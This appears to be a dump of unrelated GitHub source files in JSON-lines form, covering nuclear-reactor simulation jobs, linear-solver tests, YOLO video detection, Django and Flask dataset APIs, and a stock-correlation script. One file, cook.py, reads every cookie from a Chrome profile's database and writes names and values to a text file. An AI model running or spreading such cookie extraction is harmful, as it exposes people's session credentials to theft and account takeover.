pickle\n file from the depletion simulation\n\n Kwargs:\n doppler, geometry, voiding - set to True if desired\n the rest are self-explanatory\n \"\"\"\n\n with open(os.path.join(inputfileslog,\"inputday{}.dat\".format(day)), 'rb') as fh:\n inputfile = pk.load(fh)\n\n # temperatures to try, in K\n # this is a linearization, really, so a point on either side\n # of the nominal should work well\n testT=[850.0, 950.0]\n\n # parameters for the analysis\n tmp_or_tms='tmp'\n perlcase=3 #case param for perl script. this one assumes graphite\n # to be 50 K above the salt temperature\n\n # string that describes which changes to neutronics domain are made\n descripString = ''\n if doppler:\n descripString += 'Dopp'\n if geometry:\n descripString += 'Geom'\n if voiding:\n descripString += 'Void'\n if descripString == '':\n descripString = 'BaseCase'\n\n # copy core data for core writer\n coresize=inputfile.core_size\n coresalt=inputfile.salt_type #doesn't actually matter\n sf=inputfile.salt_fraction\n p=inputfile.pitch\n name = inputfile.inputfilename\n\n # make a temporary input file just to obtain temperature-adjusted geometry:\n # this only needs to be done once: future trial cases can include these geometry\n # files\n for thisTemp in testT:\n tempInput = RefuelCore.SerpentInputFile(core_size=coresize,\n salt_type=coresalt,\n case=1,\n salt_fraction=sf,\n pitch=p,\n initial_enrichment=0.01, #doesnt matter\n num_nodes=999,\n PPN=1234,\n queue='herring' )\n tempInput.SetInputFileName('tempAdjustGeom{}K'.format(thisTemp))\n tempInput.WriteJob()\n # now rename the resulting geometry file:\n shutil.move('MSRs2_geom.inp', 'MSRs2_geom{}K.inp'.format(thisTemp))\n os.remove(\"tempAdjustGeom{}K.sh\".format(thisTemp))\n os.remove(\"MSRs2.inp\")\n os.remove(\"corewriterparams.txt\")\n\n\n #construct new inputfiles\n inplist=range(len(testT)) # just a list with correct length\n # later will have inp file objs\n\n # each new input file must get a copy of the right fuel isotopics.\n fuelmat=None\n for mat in inputfile.materials:\n if mat.materialname =='fuel':\n fuelmat=mat #save reference to fuelmat\n break\n if fuelmat==None:\n raise Exception(\"fuel material not found in inputfile\")\n\n for i,T in enumerate(testT):\n dirname='Day'+str(day)+\"Temp\"+str(int(T)) + descripString\n if dirname in os.listdir('.'):\n if overwrite:\n os.system('rm -r {}'.format(dirname))\n else:\n print(\"Found a directory called {}. not overwriting.\".format(\n dirname))\n raise Exception(\"Will not overwrite stuff without overwrite=True\")\n os.mkdir(dirname)\n os.chdir(dirname)\n inplist[i]=RefuelCore.SerpentInputFile(core_size=coresize,salt_type=coresalt,\n case=perlcase,salt_fraction=sf,\n initial_enrichment=0.01,num_nodes=nnodes,\n pitch=p,tempK=900.0,queue=queue, PPN=ppn)\n # change inputfile name\n inplist[i].SetInputFileName(name + str(int(testT[i])) + descripString)\n\n # need great MC resolution for this calculation\n inplist[i].ChangeKcodeSettings(int(5e4), 300, 40)\n\n #set directory\n inplist[i].directory=dirname\n\n # copy isotopics from requested core\n for j,mat in enumerate(inplist[i].materials):\n if mat.materialname=='fuel':\n # change material composition\n delindex=j\n break\n del inplist[i].materials[delindex]\n inplist[i].materials.append(copy.copy(fuelmat))\n # and now the fuel must have the correct test temperature\n\n # Write the jobs, making temperature changes ONLY after write \n # to ensure that ONLY changes we want are made (doppler, void, geom)\n\n if doppler:\n inplist[i].getMat(\"fuel\").SetTemp(testT[i])\n\n # adjust which geometry file is used as appropriate\n if geometry:\n inplist[i].includefiles.remove('MSRs2_geom.inp')\n inplist[i].includefiles.append('../MSRs2_geom{}K.inp'.format(testT[i]))\n mod = inplist[i].getMat('mod')\n mod.tempK = T + 50.0\n grCTE = 3.5e-6\n mod.massdensity /= (1.0+grCTE*(T-900.0))**3\n\n if voiding:\n fuel = inplist[i].getMat(\"fuel\")\n mdens = fuel.getMassDens()\n mdens -= (testT[i]-900.0) * .003967 # from ya boy Nam\n fuel.atomdensity = None\n fuel.massdensity = mdens\n fuel.converToAtomDens()\n\n inplist[i].WriteJob()\n inplist[i].SubmitJob()\n\n os.chdir('..')\n","repo_name":"ondrejch/salt-management-DMSR","sub_path":"src/stabilitycheck.py","file_name":"stabilitycheck.py","file_ext":"py","file_size_in_byte":10744,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"25359553491","text":"from linear_system import LinearSystem\r\nfrom matrix_generators import diag, terdiag, hilbert, rand, identity\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndef iterative_testing(linear_system, eps_list):\r\n for eps in eps_list:\r\n solve, count = linear_system.iterative_solve(10 ** (-eps))\r\n\r\n print(f'\\nМетод простой итерации (eps = 10^(-{eps})):')\r\n # Найденное решение\r\n #print(pd.DataFrame(solve))\r\n print(f'Количество итераций: {count}')\r\n\r\n print('\\n----------------------------------------------------------------------')\r\n\r\ndef seidel_testing(linear_system, eps_list):\r\n for eps in eps_list:\r\n solve, count = linear_system.seidel_solve(10 ** (-eps))\r\n\r\n print(f'\\nМетода Зейделя (eps = 10^(-{eps})):')\r\n # Найденное решение\r\n #print(pd.DataFrame(solve))\r\n print(f'Количество итераций: {count}')\r\n\r\n print('\\n----------------------------------------------------------------------')\r\n\r\n\r\n# ТЕСТЫ\r\nif __name__=='__main__':\r\n print('\\n\\t\\tЗадание 4. Итерационные методы решения СЛАУ\\n')\r\n \r\n # Простая итерация\r\n print('\\n\\n\\t------------ Метод простой итерации ------------\\n')\r\n\r\n # Трёхдиагональная (плохая) матрица\r\n for dim in [20, 40, 60]:\r\n print(f'\\n\\tТрёхдиагональная (плохая) матрица (порядка {dim})')\r\n ls = LinearSystem(terdiag(dim))\r\n iterative_testing(ls, [2, 4, 6, 8])\r\n\r\n # Матрица 1 из методички\r\n print(f'\\n\\tМатрица 1 из методички А.Н.Пакулиной (порядка 2)')\r\n ls = LinearSystem([\r\n [-401.98, 200.34], \r\n [1202.04, -602.32]\r\n ])\r\n iterative_testing(ls, [2, 4, 6, 8]) \r\n\r\n # Матрица 2 из методички\r\n print(f'\\n\\tМатрица 2 из методички А.Н.Пакулиной (порядка 2)')\r\n ls = LinearSystem([\r\n [-402.90, 200.70],\r\n [1204.20, -603.60]\r\n ])\r\n iterative_testing(ls, [2, 4, 6, 8])\r\n\r\n\r\n # Метод Зейделя\r\n print('\\n\\n\\t---------------- Метод Зейделя ----------------\\n')\r\n\r\n # Трёхдиагональная (плохая) матрица\r\n print('\\n\\tТрёхдиагональная (плохая) матрица (порядка 10)')\r\n ls = LinearSystem(terdiag(20))\r\n seidel_testing(ls, [2, 4, 6, 8])\r\n\r\n # Матрица 1 из методички\r\n print(f'\\n\\tМатрица 1 из методички А.Н.Пакулиной (порядка 2)')\r\n ls = LinearSystem([\r\n [-401.98, 200.34], \r\n [1202.04, -602.32]\r\n ])\r\n seidel_testing(ls, [2, 4, 6, 8]) \r\n\r\n # Матрицы Гильберта порядка 40, 60 и 100:\r\n #for dim in [20, 40, 60]:\r\n # print(f'\\n\\tМатрица Гильберта (порядка {dim})')\r\n # ls = LinearSystem(hilbert(dim))\r\n # seidel_testing(ls, [2, 4, 5])\r\n\r\n # Большая трёхдиагональная (плохая) матрица\r\n print('\\n\\tТрёхдиагональная (плохая) матрица (порядка 300)')\r\n ls = LinearSystem(terdiag(300))\r\n iterative_testing(ls, [2, 3, 4, 5, 6])","repo_name":"lyaplyap/computational_practicum_6semester","sub_path":"iterative_solution/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16715359702","text":"import cv2\nfrom object_detection import *\nfrom utils.plots import plot_one_box\nimport numpy as np\n\nod = ObjectDetection(\"yolov7.pt\")\ncap = cv2.VideoCapture(\"tamalanrea.mp4\")\n\nfps = cap.get(cv2.CAP_PROP_FPS)\nw = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\nh = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\nvid_writer = cv2.VideoWriter(\n 'output.mp4', cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))\n\nwhile True:\n # Load Image\n _, img = cap.read()\n\n predict, names, colors = od.detect(img)\n for *xyxy, conf, cls in reversed(predict):\n label = f'{names[int(cls)]} {conf:.2f}'\n plot_one_box(xyxy, img, label=label,\n color=colors[int(cls)], line_thickness=1)\n # Show Image\n # im0 = img.copy()\n # im0 = cv2.resize(img, None, fx=0.5, fy=0.5)\n # cv2.imshow(\"Img\", im0)\n vid_writer.write(img)\n # key = cv2.waitKey(0)\n # if key == 27:\n # break\ncv2.destroyAllWindows()\n","repo_name":"asrulsaid/yolo-object-detection","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6259310865","text":"\nfrom leonardo.module.web.models import Widget\nfrom leonardo.module.nav.mixins import NavigationWidgetMixin\nfrom feincms.module.page.extensions.navigation import (NavigationExtension,\n PagePretender)\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass NavigationWidget(Widget, NavigationWidgetMixin):\n\n \"\"\"Base class for navigation widgets\n \"\"\"\n\n class Meta:\n abstract = True\n\n\nclass FlatPageContentNavigationExtension(NavigationExtension):\n name = _('Flat page content navigation')\n\n def children(self, page, **kwargs):\n base_url = page.get_absolute_url()\n widget_list = page.objects.filter(parent=None)\n for widget in widget_list:\n subchildren = []\n for subwidget in widget.media_folder_children.all():\n subchildren.append(PagePretender(\n title=subwidget,\n url='%s%s/%s/' % (base_url, widget.name, subwidget.name),\n level=5\n ))\n yield PagePretender(\n title=widget,\n url='%s%s/' % (base_url, widget.name),\n children=subchildren,\n level=5\n )\n\n\nclass NestedPageContentNavigationExtension(NavigationExtension):\n name = _('Nested page content navigation')\n\n def children(self, page, **kwargs):\n base_url = page.get_absolute_url()\n widget_list = page.objects.filter(parent=None)\n for widget in widget_list:\n subchildren = []\n for subwidget in widget.media_folder_children.all():\n subchildren.append(PagePretender(\n title=subwidget,\n url='%s%s/%s/' % (base_url, widget.name, subwidget.name),\n level=5\n ))\n yield PagePretender(\n title=widget,\n url='%s%s/' % (base_url, widget.name),\n children=subchildren,\n level=5\n )\n\n# must be at last because widgets uses mixins\nfrom .widget.breadcrumbs.models import BreadcrumbsWidget\nfrom .widget.contentnavigation.models import ContentNavigationWidget\nfrom .widget.contextnavigation.models import ContextNavigationWidget\nfrom .widget.linearnavigation.models import LinearNavigationWidget\nfrom .widget.sitemap.models import SiteMapWidget\nfrom .widget.sitesearch.models import SiteSearchWidget\nfrom .widget.treenavigation.models import TreeNavigationWidget\nfrom .widget.languageselector.models import LanguageSelectorWidget\n","repo_name":"django-leonardo/django-leonardo","sub_path":"leonardo/module/nav/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"37"} +{"seq_id":"21345516656","text":"\"\"\"\nMethods to handle incoming service requests\n\"\"\"\n\nimport json\nimport datetime\nimport uuid\nimport pkg_resources\n\nimport flask\n\nfrom sqlalchemy import exc, or_\n\n\nfrom candig_dataset_service.orm.models import Dataset, ChangeLog\nfrom candig_dataset_service.orm import get_session, ORMException, dump\nfrom candig_dataset_service.api.logging import apilog, logger\nfrom candig_dataset_service.api.logging import structured_log as struct_log\nfrom candig_dataset_service.api.models import Version\nfrom candig_dataset_service.api.exceptions import IdentifierFormatError\nfrom candig_dataset_service.ontologies.duo import OntologyParser, OntologyValidator, ont\n\n\n\nAPP = flask.current_app\n\n\ndef _report_search_failed(typename, exception, **kwargs):\n \"\"\"\n Generate standard log message + request error for error:\n Internal error performing search\n :param typename: name of type involved\n :param exception: exception thrown by ORM\n :param **kwargs: arbitrary keyword parameters\n :return: Connexion Error() type to return\n \"\"\"\n report = typename + ' search failed'\n message = 'Internal error searching for '+typename+'s'\n logger().error(struct_log(action=report, exception=str(exception), **kwargs))\n return dict(message=message, code=500)\n\n\ndef _report_object_exists(typename, **kwargs):\n \"\"\"\n Generate standard log message + request error for warning:\n Trying to POST an object that already exists\n :param typename: name of type involved\n :param **kwargs: arbitrary keyword parameters\n :return: Connexion Error() type to return\n \"\"\"\n report = typename + ' already exists'\n logger().warning(struct_log(action=report, **kwargs))\n return dict(message=report, code=405)\n\n\ndef _report_update_failed(typename, exception, **kwargs):\n \"\"\"\n Generate standard log message + request error for error:\n Internal error performing update (PUT)\n :param typename: name of type involved\n :param exception: exception thrown by ORM\n :param **kwargs: arbitrary keyword parameters\n :return: Connexion Error() type to return\n \"\"\"\n report = typename + ' updated failed'\n message = 'Internal error updating '+typename+'s'\n logger().error(struct_log(action=report, exception=str(exception), **kwargs))\n return dict(message=message, code=500)\n\n\ndef _report_conversion_error(typename, exception, **kwargs):\n \"\"\"\n Generate standard log message + request error for warning:\n Trying to POST an object that already exists\n :param typename: name of type involved\n :param exception: exception thrown by ORM\n :param **kwargs: arbitrary keyword parameters\n :return: Connexion Error() type to return\n \"\"\"\n report = 'Could not convert '+typename+' to ORM model'\n message = typename + ': failed validation - could not convert to internal representation'\n logger().error(struct_log(action=report, exception=str(exception), **kwargs))\n return dict(message=message, code=400)\n\n\ndef _report_write_error(typename, exception, **kwargs):\n \"\"\"\n Generate standard log message + request error for error:\n Error writing to DB\n :param typename: name of type involved\n :param exception: exception thrown by ORM\n :param **kwargs: arbitrary keyword parameters\n :return: Connexion Error() type to return\n \"\"\"\n report = 'Internal error writing '+typename+' to DB'\n message = typename + ': internal error saving ORM object to DB'\n logger().error(struct_log(action=report, exception=str(exception), **kwargs))\n err = dict(message=message, code=500)\n return err\n\n@apilog\ndef post_dataset(body):\n \"\"\"\n Creates a new dataset following the dataset_ingest\n schema defined in datasets.yaml\n\n The ontologies_internal property is used when looking\n up current ontologies but is not a property to be returned\n when querying the dataset.\n\n\n :param body: POST request body\n :type body: object\n\n :returns: body, 201 on success, error code on failure\n :rtype: object, int \n\n .. note::\n Refer to the OpenAPI Spec for a proper schemas of dataset_ingest and dataset objects.\n\n \"\"\"\n\n db_session = get_session()\n\n if not body.get('id'):\n iid = uuid.uuid1()\n body['id'] = iid\n else:\n iid = body['id']\n\n if not body.get('version'):\n body['version'] = Version\n\n body['created'] = datetime.datetime.utcnow()\n mapped = []\n\n if body.get('ontologies'):\n\n # Ontology objects should be {'id': ontology_name, 'terms': [{'id': 'some code'}]}\n\n mapped = {ontology['id']: ontology['terms'] for ontology in body['ontologies']}\n if 'duo' in mapped.keys():\n validator = OntologyValidator(ont=ont, input_json=mapped)\n valid, invalids = validator.validate_duo()\n\n if not valid:\n err = dict(message=\"DUO Validation Errors encountered: \" + str(invalids), code=400)\n return err, 400\n\n duo_terms = json.loads(validator.get_duo_list())\n duos = []\n\n for term in duo_terms:\n stuff = OntologyParser(ont, term[\"id\"]).get_overview()\n duos.append({**term, **stuff})\n\n body['ontologies'] = duos\n body['ontologies_internal'] = mapped\n\n try:\n orm_dataset = Dataset(**body)\n except TypeError as e:\n err = _report_conversion_error('dataset', e, **body)\n return err, 400\n\n try:\n db_session.add(orm_dataset)\n db_session.commit()\n except exc.IntegrityError:\n db_session.rollback()\n err = _report_object_exists('dataset: ' + body['id'], **body)\n return err, 405\n except ORMException as e:\n db_session.rollback()\n err = _report_write_error('dataset', e, **body)\n return err, 500\n\n body.pop('ontologies_internal')\n return body, 201\n\n\n@apilog\ndef get_dataset_by_id(dataset_id):\n \"\"\"\n :param dataset_id: UUID\n :type dataset_id: string\n\n :return: dataset specified by UUID, 200 on success. Error code on failure.\n :rtype: dataset schema, int\n \"\"\"\n db_session = get_session()\n\n try:\n validate_uuid_string('id', dataset_id)\n specified_dataset = db_session.query(Dataset) \\\n .get(dataset_id)\n except IdentifierFormatError as e:\n err = dict(\n message=str(e),\n code=404)\n return err, 404\n\n if not specified_dataset:\n err = dict(message=\"Dataset not found: \" + str(dataset_id), code=404)\n return err, 404\n\n return dump(specified_dataset), 200\n\n\n@apilog\ndef delete_dataset_by_id(dataset_id):\n \"\"\"\n Current thoughts are that delete should only be a CLI accessible command\n rather than API\n\n :param dataset_id: UUID\n :return: 204 on successful delete\n \"\"\"\n db_session = get_session()\n\n try:\n specified_dataset = db_session.query(Dataset) \\\n .get(dataset_id)\n except ORMException as e:\n err = _report_search_failed('call', e, dataset_id=str(dataset_id))\n return err, 500\n\n if not specified_dataset:\n err = dict(message=\"Dataset not found: \" + str(dataset_id), code=404)\n return err, 404\n\n try:\n row = db_session.query(Dataset).filter(Dataset.id == dataset_id).first()\n db_session.delete(row)\n db_session.commit()\n except ORMException as e:\n err = _report_update_failed('dataset', e, dataset_id=str(dataset_id))\n return err, 500\n\n return None, 204\n\n\n@apilog\ndef search_datasets(tags=None, version=None, ontologies=None):\n \"\"\"\n :param tags: List of strings\n :param version: List of strings\n :param ontologies: List of ontology terms\n :return: List of datasets matching any of the supplied parameters\n \"\"\"\n db_session = get_session()\n print(tags, version, ontologies)\n try:\n datasets = db_session.query(Dataset)\n if version:\n datasets = datasets.filter(Dataset.version.like('%' + version + '%'))\n if tags:\n # return any project that matches at least one tag\n datasets = datasets.filter(or_(*[Dataset.tags.contains(tag) for tag in tags]))\n if ontologies:\n datasets = datasets.filter(or_(*[Dataset.ontologies_internal.contains(term) for term in ontologies]))\n\n except ORMException as e:\n err = _report_search_failed('dataset', e)\n return err, 500\n return [dump(x) for x in datasets], 200\n\n\n@apilog\ndef search_dataset_filters():\n \"\"\"\n Searches through filters specified in orm/filters_search.json\n\n :return: List of filters for project searches\n :rtype: object\n \"\"\"\n valid_filters = [\"tags\", \"version\"]\n\n return get_search_filters(valid_filters)\n\n\n@apilog\ndef get_search_filters(valid_filters):\n \"\"\"\n Helper for search_dataset_filters\n\n :param valid_filters: List of filter names currently valid in the system\n :return: List of filter structures matching the names in valid_filters\n \"\"\"\n filter_file = pkg_resources.resource_filename('candig_dataset_service',\n 'orm/filters_search.json')\n\n with open(filter_file, 'r') as filters:\n search_filters = json.load(filters)\n\n response = []\n\n for search_filter in search_filters:\n if search_filter[\"filter\"] in valid_filters:\n response.append(search_filter)\n\n return response, 200\n\n\n@apilog\ndef search_dataset_ontologies():\n \"\"\"\n Queries the dataset database for all ontology terms used by the stored datasets.\n\n :return: List of all ontologies currently used by datasets\n \"\"\"\n\n db_session = get_session()\n try:\n datasets = db_session.query(Dataset)\n\n valid = datasets.filter(Dataset.ontologies != [])\n\n ontologies = [dump(x)['ontologies'] for x in valid]\n\n terms = sorted(list(set([term['id'] for ontology in ontologies for term in ontology])))\n\n except ORMException as e:\n err = _report_search_failed('dataset', e)\n return err, 500\n\n return terms, 200\n\ndef search_dataset_discover(tags=None, version=None):\n \"\"\"\n Discovery methods are not implemented at this time\n \"\"\"\n err = dict(\n message=\"Not implemented\",\n code=501\n )\n\n return err, 501\n\n\ndef get_datasets_discover_filters(tags=None, version=None):\n \"\"\"\n Discovery methods are not implemented at this time\n \"\"\"\n err = dict(\n message=\"Not implemented\",\n code=501\n )\n return err, 501\n\n\n@apilog\ndef post_change_log(body):\n \"\"\"\n Create a new change log following the changeLog\n schema in datasets.yaml\n\n :param body: POST body object following the changeLog schema\n :type body: object\n\n :return: body, 200 on success\n \"\"\"\n db_session = get_session()\n change_version = body.get('version')\n\n body['created'] = datetime.datetime.utcnow()\n\n try:\n orm_changelog = ChangeLog(**body)\n except TypeError as e:\n err = _report_conversion_error('changelog', e, **body)\n return err, 400\n\n try:\n db_session.add(orm_changelog)\n db_session.commit()\n except exc.IntegrityError:\n db_session.rollback()\n err = _report_object_exists('changelog: ' + body['version'], **body)\n return err, 405\n except ORMException as e:\n err = _report_write_error('changelog', e, **body)\n return err, 500\n\n logger().info(struct_log(action='post_change_log', status='created',\n change_version=change_version, **body))\n\n return body, 201\n\n\n\n@apilog\ndef get_versions():\n \"\"\"\n Query the change logs for and gather all the versions\n to return. \n\n :return: List of release versions of the database\n :rtype: string\n \"\"\"\n db_session = get_session()\n change_log = ChangeLog\n\n try:\n versions = db_session.query(change_log.version)\n except ORMException as e:\n err = _report_search_failed('versions', e)\n return err, 500\n\n return [entry.version for entry in versions], 200\n\n\n@apilog\ndef get_change_log(version):\n \"\"\"\n Query the database for a specific change log based on version\n\n :param version: required release version\n :return: changes associated with specified release version\n \"\"\"\n db_session = get_session()\n change_log = ChangeLog\n\n try:\n log = db_session.query(change_log)\\\n .get(version)\n except ORMException as e:\n err = _report_search_failed('change log', e)\n return err, 500\n\n if not log:\n err = dict(message=\"Change log not found\", code=404)\n return err, 404\n\n return dump(log), 200\n\n\ndef validate_uuid_string(field_name, uuid_str):\n \"\"\"\n Validate that the id parameter is a valid UUID string\n\n :param uuid_str: query parameter\n :param field_name: id field name\n \"\"\"\n try:\n uuid.UUID(uuid_str)\n except ValueError:\n raise IdentifierFormatError(field_name)\n return\n\n","repo_name":"CanDIG/datasets_service","sub_path":"candig_dataset_service/api/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":12926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11715483599","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('dashboard', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='GatewayNode',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('modified_timestamp', models.DateTimeField(auto_now=True)),\n ('node_type', models.IntegerField(default=0, choices=[(1, 'Gateway'), (2, 'Sensor-ReedSwitch'), (3, 'Sensor-EstimoteStickers'), (0, 'Others')])),\n ('node_id', models.IntegerField(unique=True, verbose_name='Node ID')),\n ('node_desc', models.CharField(max_length=32, null=True, blank=True)),\n ('user2', models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True)),\n ],\n options={\n 'verbose_name_plural': 'Gateway Node',\n 'verbose_name': 'Gateway Node',\n },\n ),\n migrations.CreateModel(\n name='SensorStickerReading',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('modified_timestamp', models.DateTimeField(auto_now=True)),\n ('server_timestamp', models.DateTimeField(null=True, blank=True)),\n ('gw_timestamp', models.DateTimeField(null=True, blank=True)),\n ('acc_x', models.FloatField(default=0.0)),\n ('acc_y', models.FloatField(default=0.0)),\n ('acc_z', models.FloatField(default=0.0)),\n ('battery_level', models.CharField(max_length=16)),\n ('power', models.IntegerField(default=1)),\n ('gw_id', models.ForeignKey(blank=True, to='dashboard.GatewayNode', null=True)),\n ('sensor_id', models.ForeignKey(to='dashboard.SensorNode')),\n ],\n options={\n 'verbose_name_plural': 'Sensor (Estimote Sticker) Reading',\n 'verbose_name': 'Sensor (Estimote Sticker) Reading',\n },\n ),\n ]\n","repo_name":"anduslim/aws_iot","sub_path":"aws_iot/dashboard/migrations/0002_gatewaynode_sensorstickerreading.py","file_name":"0002_gatewaynode_sensorstickerreading.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36375421066","text":"import sqlite3\nimport http.cookiejar\nimport os\n \n \n \n#Capture only these domains in the cookie file\n#Or change to URL_Filter = [''] to capture all cookies\n#URL_Filter = ['maco.siteground.com']\nURL_Filter = ['']\n#Desired output filename\nfile_name = ('cookies.txt')\n \n#Change USER and PROFILE to correct names\ncookie_sql = (\"/Users/petar.artinov/Library/Application Support/Google/Chrome/Profile 1/Cookies\")\n \n # cur.execute(\"SELECT host, path, isSecure, expiry, name, value FROM moz_cookies\")\n # for item in cur.fetchall():\n # c = http.cookiejar.Cookie(0, item[4]//name, item[5]//value,\n # None, False,\n # item[0] //host, item[0].startswith('.')//host, item[0].startswith('.')//host,\n # item[1]//path, False,\n # item[2]//isSecure,\n # item[3]//expiry, item[3]==\"\"//expiry,\n # None, None, {})\n # cj.set_cookie(c)\n # /Users/petar.artinov/Library/Application\\ Support/Google/Chrome/Profile 1/Local\\ Storage\n \ndef get_cookies(cj, ff_cookies):\n con = sqlite3.connect(ff_cookies)\n cur = con.cursor()\n cur.execute(\"SELECT host_key, path, is_secure, expires_utc, name, value, encrypted_value FROM cookies\") #host, path, isSecure, expiry,\n for item in cur.fetchall():\n print(item[6])\n c = http.cookiejar.Cookie(0, item[4], item[5],\n None, False,\n item[0], item[0].startswith('.'), item[0].startswith('.'),\n item[1], False,\n item[2],\n item[3], item[3]==\"\",\n None, None, {})\n cj.set_cookie(c)\n \ndef save_cookies():\n f_direc = (os.path.dirname(os.path.abspath(__file__))+os.path.sep)\n cj = http.cookiejar.CookieJar()\n get_cookies(cj, cookie_sql)\n with open(f_direc+file_name, \"w\") as new: new.write('')\n for x in cj:\n with open(f_direc+file_name, \"a\") as f:\n if any(domain.lower() in x.domain.lower() for domain in URL_Filter):\n \n #Edit( '{n}, {v}, {d}\\n' )to change format of cookie output in the .txt file\n f.write('{n}, {v}, {d}\\n'.format(n=x.name,v=x.value,d=x.domain))\n \nsave_cookies()","repo_name":"partinov/sgstuff","sub_path":"cook.py","file_name":"cook.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10422053493","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 21 15:17:37 2017\n\n@author: hyeongyu\n\"\"\"\n\n\n\nimport os\nimport pandas as pd\nimport numpy as np\n\n###################################################################\n#################### 필요한 함수 정의 부분 #################\n###################################################################\n#RV coeff 분모 구하는 부분\ndef cal_RVDenom(data, type_set=\"orig\"):\n p = range(np.shape(data)[1])\n n = np.shape(data)[0]\n\n abs_cov = abs(np.cov(data.T)) \n cov_sqr = [(abs_cov[(i,j)])**2 for i in p for j in p] \n r = sum(cov_sqr)\n if type_set == 'mod':\n mod_cal = [sum(np.square(data)[:,i] * np.square(data)[:,j] / np.square(n-1)) for i in p for j in p] \n cov_sqr_m =[cov_sqr[i] - mod_cal[i] for i in range(len(cov_sqr))] \n r = sum(cov_sqr_m)\n return r\n\n#RV coeff 구하는 부분\ndef RV(X, Y, type_set=\"orig\"):\n \n data1 = np.array(X)\n data2 = np.array(Y)\n \n #각 컬럼 별 표준화 \n data1 = (data1 - data1.mean(axis=0))/(data1.std(axis=0))\n data2 = (data2 - data2.mean(axis=0))/(data2.std(axis=0))\n\n n = np.shape(data1)[0]\n p1 = range(np.shape(data1)[1])\n p2 = range(np.shape(data2)[1])\n \n comb = [(i,j) for i in p1 for j in p2]\n \n #calculate numerator \n vecnum = [] \n for i in comb: \n elemnum = np.square(np.cov(data1[:,i[0]], data2[:,i[1]])[0,1])\n # for the modified\n if type_set==\"mod\":\n elemnum -= sum((data1[:,i[0]] ** 2) * (data2[:,i[1]]) **2)/np.square(n-1) \n vecnum.append(elemnum)\n num = sum(vecnum)\n \n #calculate denominator \n denom1 = cal_RVDenom(data1, type_set)\n denom2 = cal_RVDenom(data2, type_set)\n\n RV = num/np.sqrt(denom1*denom2)\n \n return RV\n\n#################################################################\n############# 변수 및 파라미터 설정 부분 ###################\n#################################################################\n#beta 연산 관련\nperiod_list = [1,3,6,12] #beta 연산 기간(달 단위)\n\ndirectory = r\"C:\\Users\\User\\Documents\\bro_py\" #default directory\nindex_list = ['preprocess_nan_DAX30_all.csv', 'preprocess_nan_kospi200_all_all.csv', 'preprocess_nan_nikkei225_all.csv', 'preprocess_nan_SnP500_all.csv', 'preprocess_nan_SSE50_all.csv']\n\nskip_cf = 48 #기업 데이터가 4년 미만일 경우 skip\n#################################################################\n############# 실제 연산 부분 ###################\n#################################################################\n#default 디렉토리 설정\nos.chdir(directory)\n\nrd_dir = 'Preprocessed_dataset\\\\Modeling_Data_all\\\\'\nwt_dir = 'Preprocessed_dataset\\\\Network_Data_all\\\\'\n\n\n\nif not os.path.exists(wt_dir):\n os.makedirs(wt_dir )\n\n\nfor period in period_list:\n #코드 실행 결과 출력 관련 \n #생성 파일 저장 directory \n read_directory = 'Close_Volume_Beta_'+str(period) +'_v2'\n for indexnm in index_list: \n skip_corp_list = []\n\n data_org = pd.read_csv(read_directory+'\\\\'+indexnm)\n data_org.index = data_org.iloc[:,0]\n data =data_org.drop(data_org.columns[0],1)\n\n num_comp = np.shape(data)[1]\n\n #두 기업의 row 수를 맞춰야함\n X = data.iloc[:,list(range(num_comp-3,num_comp ))]\n Y = data.iloc[:,list(range(num_comp-6,num_comp-3 ))]\n \n X.columns\n Y.columns \n \n too_many_nan = False\n\n intersection_date = set(X.index[list(~np.isnan(X.iloc[:,2]))]).intersection(Y.index[list(~np.isnan(Y.iloc[:,2]))])\n \n inter_X = X.loc[intersection_date ,]\n inter_Y = Y.loc[intersection_date ,]\n \n X_index = inter_X.columns[0][:-6]\n Y_index = inter_Y.columns[0][:-6]\n \n if len(intersection_date) < skip_cf:\n too_many_nan = True\n continue\n \n rv_coef = RV(inter_X, inter_Y )\n \n \n print(str(period), indexnm[18:-4], '\\t', X_index,'\\t', Y_index, '\\t',rv_coef)\n \n ","repo_name":"5eo1ab/competition-index-prediction","sub_path":"data_preprocess_code/ck_err_cormat_val.py","file_name":"ck_err_cormat_val.py","file_ext":"py","file_size_in_byte":4109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1086693572","text":"'''\n두 개의 동일한 수열\n의사코드\n1. A 와 B의 리스트를 입력받는다.\n2. A 원소 하나를 B의 모든 원소와 비교하고 같은 값이 있으면\n3. flag를 True로 만들어서 2중 for문을 탈출한다.\n4. repeat() 메소드의 결과가 True면 Yes, False면 No를 출력한다.\n\n자기 리뷰\n사실 